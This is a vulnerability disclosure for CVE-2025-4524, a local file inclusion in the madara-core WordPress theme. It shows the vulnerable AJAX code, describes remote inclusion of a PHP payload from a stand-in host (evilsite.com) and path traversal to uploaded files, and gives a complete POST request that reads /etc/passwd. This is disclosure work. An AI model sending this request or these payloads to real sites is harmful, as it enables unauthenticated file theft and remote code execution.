CVE-2025-4524 - Unauthenticated madara-core Wordpress theme LFI

WordFence link

Description

A vulnerability lies in madara’s madara_load_more action, where a template parameter is arbitrary data from the user and passed to PHP’s include function.

Vulnerability

A vulnerability lies in madara’s madara_load_more action, where a template parameter is arbitrary data from the user and passed to PHP’s include function.

The vulnerable code is as follows:

add_action( 'wp_ajax_madara_load_more', array( $this, 'ajax_load_next_page' ) );
add_action( 'wp_ajax_nopriv_madara_load_more', array( $this, 'ajax_load_next_page' ) );

...

function ajax_load_next_page() {
  ...
  
  if ( $query->have_posts() ) {
    while ( $query->have_posts() ) {
      $query->the_post();
      $madara_loop_index ++;
      set_query_var( 'madara_loop_index', $madara_loop_index );
      
      if ( $madara_loop_index < $posts_per_page + 1 ) {
        if ( ( strpos( $template, 'plugins' ) !== false ) ) {
          include( $template ); // we are in wp-content\themes\madara\app\{plugins} VULN
        } else {
          //$post_format = get_post_format() ? get_post_format : '';
          get_template_part( $template, get_post_format() );
        }
      }
    }

    if ( $query->post_count <= $posts_per_page ) {
      // there are no more posts
      // print a flag to detect
      echo '<div class="invi no-posts"><!-- --></div>';
    }
  } else {
    // no posts found
  }

  /* Restore original Post Data */
  wp_reset_postdata();
  die( '' );
}

On each successful query of madara_load_more, the template passed in by template will be rendered with the result. If the string plugins is seen in the template parameter, the input is passed as is to include, while if it is not present, Wordpress will find the template.

We can use this to query arbitrary files, either with https://evilsite.com/plugins/evil.php if allow_url_include is enabled, or via a path traversal. Since the current directory when doing this actions is wp-content/themes/madara/app/, and a plugins directory exists, we can include something like plugins/../../../../../wp-content/uploads/evil.png.

Exploit

This can be exploited depending on allow_url_include.

If it is enabled, a malicious actor can setup an HTTP server that replies with a malicious PHP script upon receptionof a request with the string plugins.

If it is disabled, a malicious actor can upload a file containing a PHP string (Image EXIF metadata, image pixel data, etc.) through other means on the Wordpress instance and include the file. This way, the image data will not be interpreted as PHP and only the PHP between tags will be.

This can lead to RCE or LFI.

image

POST /wp-admin/admin-ajax.php HTTP/2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 490

action=madara_load_more&page=1&template=plugins/../../../../../../../etc/passwd&vars%5Borderby%5D=meta_value_num&vars%5Bpaged%5D=1&vars%5Btimerange%5D=&vars%5Bposts_per_page%5D=16&vars%5Btax_query%5D%5Brelation%5D=OR&vars%5Bmeta_query%5D%5B0%5D%5Brelation%5D=AND&vars%5Bmeta_query%5D%5Brelation%5D=AND&vars%5Bpost_type%5D=wp-manga&vars%5Bpost_status%5D=publish&vars%5Bmeta_key%5D=_latest_update&vars%5Border%5D=desc&vars%5Bsidebar%5D=right&vars%5Bmanga_archives_item_layout%5D=big_thumbnail